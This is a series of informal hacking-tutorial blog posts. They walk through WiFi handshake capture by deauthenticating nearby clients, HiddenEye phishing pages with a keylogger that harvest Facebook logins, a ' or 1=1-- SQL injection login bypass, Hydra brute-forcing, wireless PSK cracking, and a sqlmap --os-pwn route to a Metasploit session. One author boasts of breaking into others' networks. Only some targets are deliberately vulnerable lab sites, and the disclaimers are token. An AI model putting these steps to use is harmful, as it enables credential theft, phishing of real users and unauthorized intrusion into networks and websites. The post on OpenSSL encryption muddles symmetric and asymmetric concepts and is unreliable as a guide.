Hashcatch V1.0 automated WiFi hacker

Welcome to hackingarise I’m the laughing man and this a tutorial is on Hashcatch a bash tool to automate wifi hacking dosnt that sound sexy my people ahaha i bet all u script kiddies are coming in your pants right about now lol only joking or am i hahaha so i found this tool just looking true github you know when you are bored out your skull and noting else to do on like best part you im not a black hat

😜

this script can run on linux or nethunter not sure about termux but worth a try as it works in my termux but if nethunter running in termux as well as iv it flashed to my s6 anyways lets move on .

What is Hashcatch

Hashcatch deauthenticates clients connected to all nearby WiFi networks and tries to capture the handshakes. It can be used in any linux device including Raspberry Pi and Nethunter devices so that you can capture handshakes while walking your dog.
Find out more here

SivaneshAshok git hub here

How to install Hashcatch

open a terminal and type

git clone https://github.com/staz0t/hashcatch.git
cd hashcatch
ls
chmod +x hashcatch

now we need to install hcxtools so frist we need to clone the script so type

git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make

How to use Hashcatch

now we type
./hashcatch
this will gave us a error and tell use to type hashcatch --setup

now we type ./hashcatch --setup

it will ask u for the wifi interface this is eader wlan0 or wlan1 use ifconfig to find your one

now to run the script we type ./hashcatch and let it run

Final thoughts

so lads this script is handy for lot of things me personally i be using when Im sitting out side pedos houses to braking in to there network. in all-fairness for people that dont understand how to hack WiFi this the script for you as well for hackers as this fast script for ya to use war-driving 😉

how to use rebel - framework V1.0

welcome to hacking a rise in this post we are going to show u how to use and install the easy rebel framework for pen-testers and hackers a like . Rebel is mead in bash so it can run on on kali,parrot and termux,nethunter etc .. it is packed with easy to use modules

what is rebel framework

Advanced and easy to use penetration testing framework the person that mead the tool is called Magdy Moustafa
reb311ion Github here
Module it offers for you to use
├
├ net/iface ➤ Interface info.
├ net/map ➤ Hosts live Scan in LAN.
├ net/scan ➤ Scan [Ports, OS, Etc] IP.
├ net/vuln ➤ Scan for common vulnerabilities.
├ net/sniff ➤ Unencrypted traffic network sniffer and modifier.
├ net/sslsniff ➤ Sslstrip and sniff traffic.
├ net/cut ➤ Cut connection between two points or more.
├
├ info/site ➤ Website information
├ info/phone ➤ Phone number information
├ info/server ➤ Find IP Address And E-mail Server
├ info/whois ➤ Domain whois lookup
├ info/loc ➤ Find website/IP address location
├ info/bcf ➤ Bypass CloudFlare
├ info/subdomain ➤ Subdomain scanner
├ info/valid ➤ Check Email address validation
├ info/domain ➤ Search Domain for Email addresses
├ info/email ➤ Email information gathering
├
├ web/dirscan ➤ Scan for hidden web directories
├ web/appscan ➤ Gather OSINT and fuzz for OWASP vulnerabilities
├ web/cmsscan ➤ Scan and detect CMS vulnerabilities [WordPress, Joomla and Drupal]
├
├ com/chat ➤ create or join an existing chatroom
├ com/qrshare ➤ Send files using QR codes
├
├ torrent/search ➤ Search for torrents and get their info
├ torrent/get ➤ Download torrents using command line
├
├ crypto/rot ➤ Rot1..25 decoder
├ crypto/auto ➤ Detect and decode encoded strings & crack hashes
├ crypto/mdr1 ➤ Encode/decode strings using our own Encoding algorithm
├ crypto/find ➤ Find hashes inside files [md5,sha256,sha512crypt,etc..]
├
├ phish/google ➤ Google phishing using ngrok.
├ phish/in ➤ LinkedIn phishing using ngrok.
├ phish/git ➤ Github phishing using ngrok.
├ phish/stack ➤ StackOverflow phishing using ngrok.
├ phish/wp ➤ WordPress phishing using ngrok.
├ phish/twitter ➤ Twitter phishing using ngrok.
├ phish/advanced ➤ Customizable advanced phishing
├
├ re/info ➤ Collect information about the binary file
├ re/trace ➤ Trace binary/PID system calls and signals
├ re/elfdec ➤ Decompile elf file function(s)
├
├ df/entropy ➤ Calculate file entropy
├ df/recover ➤ Recursively scan and extracts all recoverable files
├ df/scan ➤ Scan and recover a disk image for regular expressions and other contentInstall

How to install rebel framework

open terminal type git clone https://github.com/Hackingariseofficial/rebel-framework.git
or git code https://github.com/reb311ion/rebel-framework.git

the we need to cd to rebel framework and type chmod +x setup.sh then ./setup.sh

that it .

How to use rebel framework

type in terminal chmod +x rebel.sh then ./rebel.sh

now for the command type help

Help
├
├ show modules ➤ List all available modules
├ use + ➤ Use module
├ show options ➤ Show module options
├ banner ➤ Display an awesome rebel banner
├ set ➤ Set a value to an option
├ run ➤ Run module
├ clear/reset ➤ Clear screen
├ back ➤ Back to the main
├ exit – quit ➤ Exit from rebel
├ ! ➤ Execute shell commands
├ help – ? ➤ Show this message
└

now we use show modules to see what modules come with rebel framework

right lady’s to use the modules we type use and the modules name use info/site then show options
you will see google.com is set as target just type run

if u wanna set the site u want to get the info of then type set target (url of the site) and then run

to go back type back

so let try another one info/email so same command use info/email then show options then set target (targets email here )

my thoughts

well lads its a easy to use and it easy to set up so i have no faults with it other than it cud have a lot more on it like for a bash script like its handy noobs starting out to advance pen testers for a nice fast script to make your life easier

Perform asymmetric encryption - OpenSSL help

Hello everyone, this is IRISnoir from Hackingarise.

And I’m bringing to you another tutorial. This time, it’s about performing asymmetric encryption.

First, have this installed:
– openssl-tool because it’s the command line interface for encrypting files.

Now, let me explain what all of this mean:

Encryption is the act of concealing data using a special cipher.9

Ciphers (Cyphers) are the algorithms for encrypting data. The numbers of algorithms are vast but the best ones are the AES algorithm. These are the ones I will be using.

Asymmetric encryption, it means encrypting data with a ‘public key’ and decrypting with ‘private key’ (Don’t worry, we’ll get to those soon enough). This is the opposite of symmetric encryption.

Symmetric encryption, however, works the same BUT there is a disadvantage. There are no appearant keys, the only thing you have is the ‘secret key’ (I will get to that too). That means that the decryptor can have access to the data withOUT needing a key.

Now, onto the key types.

Private key: This is the type of key used in asymmetric encryption. It is for decrypting encyphered data. It appears as a PEM (Privacy Enhanced Mail) file.

Public key: This is used in asymmetric encryption just like private keys. But this type is for encrypting data. It also appears as a PEM file.

Secret key: This is for symmetric encryption. This is technically a key but it doesn’t take any “physical” appearance like a file. Instead, it’s the cipher type that gives it all away. If the decryptor knows what cypher you use, they can be able to decrypt it with ease. This is the downside I was mentioning about.

Now, we’re done with the terminology. Let’s get to the fun part of this whole thing, shall we.

Now, to encrypt and decrypt data asymmetrically, you will need a public key (to encrypt) and a private key (to decrypt). And to generate those, all you need to do is use these commands simutaneously:

Activate the command line interface with:
openssl

Step 1: A private key must be generated with:
OpenSSL> genrsa -out pri.pem -aes-256-cbc 2048

Step 2: Generate the public key based on the private key:
rsa -in pri.pem -out pub.pem -outform PEM -pubout -aes-256-cbc

Step 3: Use your keys.

To encrypt:
OpenSSL> rsautl -encrypt -inkey pub.pem -pubin -ssl -oaep -in file.txt -out file_encrypted.txt

To decrypt:
openssl rsautl -decrypt -inkey pri.pem -ssl -oaep -in file_encrypted.txt -out file.txt

Note: The private key is for solving the encrypted file. Do NOT get it LEAKED.

That’s about it for this. I hope that you enjoy. If so, please share it with your friends and remember, stay safe, stay ethical as we are never responsible for your acts or any tlrouble you get yourself into.
Also, check this out: OpenSSL instruction: How to encypher and decypher files

How to use Hidden eye v 1.0

welcome to hackingarise i am the laughing man the one and only and today in this post for Wednesday bit late with posting but look has to be do lol anyways in this we are going to use hidden eye this a advance phishing tool in python3 working on pc and termux
Find out more here

[wpedon id=”8238″ align=”center”]

what pages with hidden eye

1) Facebook:

Traditional Facebook login page.
Advanced Poll Method.
Fake Security login with Facebook Page.
Facebook messenger login page.

2) Google:

Traditional Google login page.
Advanced Poll Method.
New Google Page.
3) LinkedIn:

Traditional LinkedIn login page.

4) Github:

Traditional Github login page.
5) Stackoverflow:

Traditional Stackoverflow login page.
6) WordPress:

Similar WordPress login page.
7) Twitter:

Traditional Twitter login page.
8) Instagram:

Traditional Instagram login page.
Instagram Autoliker Phishing Page.
Instagram Profile Scenario Advanced attack.
Instagram Badge Verify Attack [New]
Instagram AutoFollower Phishing Page by (https://github.com/thelinuxchoice)
9) SNAPCHAT PHISHING:

Traditional Snapchat Login Page
10) YAHOO PHISHING:

Traditional Yahoo Login Page
11) TWITCH PHISHING:

Traditional Twitch Login Page [ Login With Facebook Also Available ]
12) MICROSOFT PHISHING:

Traditional Microsoft-Live Web Login Page
13) STEAM PHISHING:

Traditional Steam Web Login Page
14) VK PHISHING:

Traditional VK Web Login Page
Advanced Poll Method
15) ICLOUD PHISHING:

Traditional iCloud Web Login Page
16) GitLab PHISHING:

Traditional GitLab Login Page
17) NetFlix PHISHING:

Traditional Netflix Login Page
18) Origin PHISHING:

Traditional Origin Login Page
19) Pinterest PHISHING:

Traditional Pinterest Login Page
20) Protonmail PHISHING:

Traditional Protonmail Login Page
21) Spotify PHISHING:

Traditional Spotify Login Page
22) Quora PHISHING:

Traditional Quora Login Page
23) PornHub PHISHING:

Traditional PornHub Login Page
24) Adobe PHISHING:

Traditional Adobe Login Page
25) Badoo PHISHING:

Traditional Badoo Login Page
26) CryptoCurrency PHISHING:

Traditional CryptoCurrency Login Page
27) DevianArt PHISHING:

Traditional DevianArt Login Page
28) DropBox PHISHING:

Traditional DropBox Login Page
29) eBay PHISHING:

Traditional eBay Login Page
30) MySpace PHISHING:

Traditional Myspace Login Page
31) PayPal PHISHING:

Traditional PayPal Login Page
32) Shopify PHISHING:

Traditional Shopify Login Page
33) Verizon PHISHING:

Traditional Verizon Login Page

34) Yandex PHISHING:

Traditional Yandex Login Page

35) Reddit PHISHING:

Old Login Page
New Login Page

as u see there is a lot of pages for you to use

how to install hidden eye

right lads first of we got to clone the file to are systems so open terminal and type
git clone https://github.com/DarkSecDevelopers/HiddenEye

or git clone https://github.com/Hackingariseofficial/HiddenEye

Next we need to change are dir to hidden eye so type
cd HiddenEye

now before we go on lets fix any errors that may show up so type
dpkg-reconfigure locales

and pip install urlopen

now that is done now we need to install the requirements we can do this but typing
pip3 install -r requirements.txt

now that’s done we can run the python file named HiddenEye.py so type
python3 HiddenEye.py

now press y

now we can see all the sites that we can use just pick a number from 1 to 37

im picking 1 for Facebook for this as its first one

now it will ask you to pick
<1>standard page for phishing ,
<2>advanced phishing-poll ranking
<3>fake security
<4>messenger phishing
im picking 1 just for this

now it will as if u wanna add a key logger to the page
pick y

now it will ask for the site u want it to redrecit to when the username and password is entered since we are using Facebook type facebook.com

now we need to set the ports u can pick any port u want

now we have choice to pick serveo or ngrok so pick serveo as it works better

now this the part u mite get confused u can make a random url or a custom one to make it more authentic
make sure to pic one

this we we make the url look real so type facebooklogin in here

now it will gave us the url facebooklogin.serveo.net
this the one we sen to the target

when the target clicks the link and signs in it will send us back there ip location and the user name and password

there u have it lads and gals the facebook username and password

Final thoughts on hidden eye

there u have it lads the hidden eye i was shocked how good it is i know a lot my members in hacking a rise discord use it and say noting but good about it so gave it a go lads and see what u think and comment below
LAUGHINGMAN OUT
HACK THE PLANT LADS

disclamer

Dont be a dick head and use this to hack facebook accounts as its a-gen the law and morally wrong respect peoples private accounts as we take no responsibility for your actions in other works u do it and get found out its on you not me

Introducing AcuForum - the extra weak forum

Hello everyone, this is IRISnoir from Hackingarise. I am back with another post for you. Now, today, we will be discussing about AcuForum, as you see in the title.

Now, AcuForum is a testing and demonstrating “forum” for the Acunetix Web Vulnerability Scanner. It’s SUPER vulnerable and is infested by hackers all around.

Be cautious, though. Because if you can get in there easily, then why can’t the others. And if you’re skillful, you can know and avoid their grip against you. You must refrain from touching the links, even if they’re tempting.

First of all, initiate your VPN. Because the site has an IP logger. Also, Secure your DNS.

Now, go to it with this link: http://testasp.vulnweb.com/

You will then need to LOGIN
Just press the login button on the greenish bar.

But you can’t login, you don’t wanna register too, because you don’t need another login for a useless site. WhaT ArE YOu GonNA DooOOo!!11!

Well, it’s easy. You inject them with malicious SQL code.
I will give you a step by step tutorial:
1 – Put ‘admin’ at the username part. I know that you can put anything there but putting admin makes it all cooler.

2 – Inject SQL code into the Password bar: ' or 1=1--
Now, I’m gonna break this piece of code down into parts and explain them. This is for those that haven’t learnt about SQL injection yet. You can skip this.

Broken down code: ‘ | or 1=1 | —
He first part is the apostrophe. Now, you might be thinking. Why is an apostrophe needed. That is because it is SQL code. Here is a sample of what SQL code looks like:


SELECT *
FROM users
WHERE name = 'admin'
AND pass = '' or 1=1--' LIMIT 1


At the start, you can see ''. That means the apostrophe we mentioned acted as a stopping part for the starter one.

Now, we go to the 'or 1=1' part. When you combine the statement, it actually makes sense:

'' or 1=1

This will make it so that the results are ALWAYS TRUE. Making the system give you entry no matter what. That is just dangerous. Am I right?

To the '--' part, it acts as a commenter. Meaning that it turns everything beyond the '--'. It will force the system to discard the other code beyond those two negative sentiment.

Instead of the system seeing this:
AND pass = '' or 1=1--' LIMIT 1
It actually can only execute this part:
AND pass = '' or 1=1

If you ask me what teamwork really is, I will show you this. Each of the code all do their part. Just like everything should be in exploiting and hacking. SQL is just dangerous.

Now, enough with the chit chat. When you enter the 'credentials', which means:
admin:' or 1=1--
Then you will gain entry as ADmIn. How exciting!!!

Then you can make a post. About whatever you want. You can say Hi, perform some XSS, or whatever you want. BUT, secure yourself. Use a VPN and secure your DNS. Again, AcuForum has an IP logger there for your actions. Be alert. Once you get caught, it's all over.

It is also vulnerable to more attacks, like directory traversal, and more, can you find and perform all the exploits?

Now the DISCLAIMER: This is just for education purposes, stay safe, stay ethical as Hackingarise is never responsible for your malicious deeds.

It's legal only if you hack sites that are dedicated specifically for hacking like AcuForum itself. Hacking others will get you in trouble.

Thank you for reading, if you like this website and find it useful and informative, share it to your friends. Also, please make a donation, it will help us a BUNCH.

Also, check this out.

Have a nice day.

How to install android 8.0 on virtual box for a test lab

Wassap people laughing man here with another one to start are Monday off with how to install android ROM on a virtual box for testing payloads and apps so on . See the beauty of vms are no matter what you do u can always take a screen shot and go back if u fuck up your os lol as well as it make it safer for you to use the likes of tor etc .. (note tor is a example there are still load more thing to do that just run tor in a vm lets get stuck in to this tutorial what we will be using is a virtual box

What is android

Android is a mobile operating system developed by Google. It is based on a modified version of the Linux kernel and other open source software, and is designed primarily for touchscreen mobile devices such as smartphones and tablets
Find out more here

What is virtual box

Oracle VM VirtualBox is a free and open-source hosted hypervisor for x86 virtualization, developed by Oracle Corporation. Created by Innotek GmbH, it was acquired by Sun Microsystems in 2008, which was, in turn, acquired by Oracle in 2010. VirtualBox may be installed on Windows, macOS, Linux, Solaris and OpenSolaris
find out more here

What you need

so first of we need to do is Download virtual box this will let us run a android in are system Download virtualbox here and install it on your system if u have it installed then move on to the next step

Now we need to download a android iso You can find it here and Download 32 bit Download here

installing android

now open up virtual box and click new and change the windows to Linux then other Linux 64 or 32 depending on your ISO file you downloaded

now we set the ram set it to what ya want you depending on the ram in your system

Now we need to make a virtual disk in other words gave are vm a hard drive

(lets take a moment to think how easy this is like come on man a 3 year old can do it lol )

right lads now we need to make the file that will act as are vms hard drive so pick VDI

now we are going to be asked if we wanna make it a fixed size or dynamically pick dynamically allocated

here we gave it space put what you want well not what you want as god knows the size your hard-drive me i have 2 tb so i can afford to gave it a good bit but for this im gaving it 47.88 gb

now we need to add the ISO file so see the little disc beside IDE Secondary master click that and go to were your downloads

and this it with the ISO

now we need to put the vim online so go to settings and then to network and bridge the network be it lan or wifi

Now lads we can run the vm so press ok and it should bring you to this screen u can pick live boot ,debeg mode ,install it all depends on you what you want to do me i hit install a u can see in the picks i have like 3 vm android

ending statement

As i said at the start android vms come in handy now just for hacking for load others like mobdro show box snap-chat as well as testing apps playing games or making explots for game hacks so ya its allways handy to have one and up to date version this one is android 8

XBRUTE - Hydra automated wizard

Hello everyone~

This is IRISnoir from Hackingarise. Bringing to you another one of our tutorials. This one is about how to use a hand-made hydra script.

That script is made by me. I feel proud as this is the first ever script that I ever made and share. And as it is my first script that I crafted, the code may look bad, so don’t focus on that and criticise me. Just focus on its functionality. This is the GitHub link to my tool. I hope you can enjoy it as much as I enjoy making it.

Now, what you need to pre-install are:
– git to clone the tool into your folder
– python to execute the tool as its language is Python after all

Once you get that all o’ those bad bois installed, it’s time for the real deal.

First, clone the tool via:
git clone https://github.com/IRISnoir/xbrute

Then, you may execute the tool with:
python xbrute/xbrute.py

Then it will install 2 more tools: hydra(obviously), and toilet(for the fancy splash message)

Now, fill in the information like you’re being interrogated or interviewed. This includes server name, user login, protocol and port, etc.. I tried to make it as user-friendly as possible.

Remember, the * at the start of each question means that it must be filled in like the server name, protocol type, and more… Others can either be left blank or will have a default value just like the decision to write your successful cracks into a file.

When you reach the part where it asks for a bruting method, this question fits most: What is the difference between hydra-wizard and your tool, xbrute?
The answer is simple, it uses the technique where it DOESN’T require a password list. It can automate cracking and make it easier.

At option [1]: You can brute with random characters of the minimum and maximum length of your choice. The chance of this successing is less than 10% but there is ALWAYS a chance, however small it is, that you can crack open an account. If you provide a file as login for mass bruteforce, it will become wild and give you a better chance at breaking at least 1 login. If the password is in there, of course.

Now, onto option [2]: Now, this is the overpowered part of the whole script. All you need is the patience. Well, the password has to be all numbers and has to start with a ‘1’ or above. If the conditions meet, the chance of success will be 100%. You just need to wait. Very cool and overpowered, I know.

Almost there, we have option number [3]: This is like option [1] and [2] combined. This is a total wildcard just like [1]. And it’s a number generator, just like [2]. It’s self explanatory. It’s basically a gamble. You can gamble with time. You can either get faster cracking with luck of course. But in return, if you get extremely unlucky, then the time wasted will be even longer than using option [2].

Finally, option [4] is the standard file specification that Hydra uses. Where you download a wordlist and use it on your logins. Downloading a wordlist is feasible. The probability of success depends. Just like old times. This is the only option that requires good storage.

And there you go, you are pretty much good. It is user-friendly and you just answer question instead of typing the command out.

DISCLAIMER: Do NOT engage in illegal activities as Hackingarise is NEVER responsible for any of your malicious acts or any trouble you get yourself into. So stay safe, stay ethical. Have a nice day.

You can check more about Hydra here.

SniffAir framework for wireless attacks

Wasap people laughing man here with another post this ones on sniff air made for sophisticated wireless attacks and data capture it is mead with python 2.7 bit out dated on the python but still great tool to use (note this tool is not for noobs as u can coz harm to your network to the point it cant be fixed so lets start

What is sniffair

SniffAir is an open-source wireless security framework which provides the ability to easily parse passively collected wireless data as well as launch sophisticated wireless attacks. SniffAir takes care of the hassle associated with managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic, looking for potential security flaws. Along with the prebuilt queries, SniffAir allows users to create custom queries for analyzing the wireless data stored in the backend SQL database. SniffAir is built on the concept of using these queries to extract data for wireless penetration test reports. The data can also be leveraged in setting up sophisticated wireless attacks included in SniffAir as modules.
SniffAir is developed by Tyl0us and theDarracott

how to install sniffair

type in terminal
git clone https://github.com/Tylous/SniffAir
cd SniffAir
chmod +x setup.sh
./setup.sh


How to use sniffair

now we type python sniffair.py

now we need to add a workspace so type workspace crate laughingman or what ever name u wanna use

now we load the workspace so type workspace load laughingman

now type show modules

now we type use Auto PSK
then info

Now we can start setting up the settings for a attack so type set varibles once set type run to let it run
[laughingman][Auto PSK]# set varibles ssid FRITZBox 7430 ZV
[laughingman][Auto PSK]# set varibles Password file /usr/share/ike-scan/psk-crack-dictionary
[laughingman][Auto PSK]# run

just let it run and with for the password

Right lads there we have it wireless hacking framework its a good tool but for noobs its not the best as its more advance than most the tools out there so best stick to the basic tools NOOBS till u learn more anyways laughingman out 🙂

Sql injection to Metasploit session

Wassap people i am him the one and only laughing man back with ye another post this one on sql injection to metasploit session I know most you thinking laughing man you talking shit well sorry lads I’m not metasploit framework has many uses not just for payloads the can do almost anything from recon to exploiting so for this iv set up a lad with dvwa so lets start lads

What is sql injection

SQL injection is a code injection technique that might destroy your database.
SQL injection is one of the most common web hacking techniques.
SQL injection is the placement of malicious code in SQL statements, via web page input.

Find out more here

what is Metasploit Framework

The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit Framework contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. At its core, the Metasploit Framework is a collection of commonly used tools that provide a complete environment for penetration testing and exploit development.

Find out more here

What is Dvwa

DVWA is a DAMM VULNERABLE WEB APP coded in PHP/MYSQL. Seriously it is too vulnerable. In this app security professionals, ethical hackers test their skills and run this tools in a legal environment. It also helps web developer better understand the processes of securing web applications and teacher/students to teach/learn web application security in a safe environment.
The aim of DVWA is to practice some of the most common web vulnerability, with various difficulties levels.

Find out more here

what is burp suite

Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications.
Find out more here

What is sqlmap

sqlmap is an open source software that is used to detect and exploit database vulnerabilities and provides options for injecting malicious codes into them. It is a penetration testing tool that automates the process of detecting and exploiting SQL injection flaws providing its user interface in the terminal.
Find out more here

How to preform the attack

first of all we get a are target this my target http://192.168.8.101/DVWA/vulnerabilities/sqli//DVWA/vulnerabilities/sqli/?id=1&Submit=Submit# now i have my target i can check is it vulnerable to sql injection so what we do is put a ‘ right after the 1 in the url so the url looks like this http://192.168.8.101/DVWA/vulnerabilities/sqli/?id=1'&Submit=Submit#

once you see this
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ”1”’ at line 1 message when you add the ‘ at the end the of the url for example http://www.asfaa.org/members.php?id=1'

as u see in this image when we add the ‘ at the end the url it tells us theres a error ”
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /nfs/c05/h02/mnt/83231/domains/asfaa.org/html/members.php on line 67″
when we get this error we can use tools like sqlmap , burp suite etc

Now we need to set up the burpsute proxy’s in firefox so type about:preferences in to the url bar in firefox to get the settings scroll down to network

and the proxy for burp suite

now we load up burp suite open the terminal type burp suite or go to the top left of the screen to applications and to web applications analysis and click burp suite

now when we add the ‘ to the url burp suite will pop up

The cookie we need is Cookie: security=low; security=low; PHPSESSID=4kaa6819siab01k545959q45v0

now we open a new terminal and type sqlmap -u 192.168.8.101/DVWA/vulnerabilities/sqli/ --data="id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4kaa6819siab01k545959q45v0" --dbs

now we type sqlmap -u 192.168.8.101/DVWA/vulnerabilities/sqli/ --data="id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4kaa6819siab01k545959q45v0" --msf-path=/usr/share/metasploit-framework/ --os-pwn --tmp-path="C:/Docments and settings/Administrator/Local Settings/Temp"

now we pick the payload i mostly pick php

this will add the payload to the site and inject it to the browser of the views

show the proof it was connected

there ya have it lads and gals how to use sqlmap to get a metasploit session dont use this for the wrong reasons hacking is agen the law unless you have consent of owner

The 99 website scanner

welcome back to hacking a rise people i am him the one and only laughing man so i was on Facebook see lot noobs out there saying they dont know how to use a simple web scanner so i mead a script last nyt about 3 am called The99 named it after Brooklyn 99 lol yes i know kinda funny show about cops haha fuck them im using golismero

What is golismero

GoLismero is an open source framework for security testing. It’s currently geared towards web security, but it can easily be expanded to other kinds of scans.

The most interesting features of the framework are:

Real platform independence. Tested on Windows, Linux, *BSD and OS X.
No native library dependencies. All of the framework has been written in pure Python.
Good performance when compared with other frameworks written in Python and other scripting languages.
Very easy to use.
Plugin development is extremely simple.
The framework also collects and unifies the results of well known tools: sqlmap, xsser, openvas, dnsrecon, theharvester
Integration with standards: CWE, CVE and OWASP.
Designed for cluster deployment in mind (not available yet).
Find out more

What is the 99

Well lads the 99 is a bash script mead by me to speed up scanning websites wile pentesting it more for the noobs that can understand the tools and how to scan sites

Installing The 99

Lads install the 99 is easy start with open terminal and git clone
git clone https://github.com/Hackingariseofficial/The99.git

now change the dir to the 99
cd The99

now we gave it promissions
chmod +x the99.sh

that’s it lads simple

using The 99

so lads using the The99 is so easy start with typing
./the99.sh
add the url u wanna scan and with the 99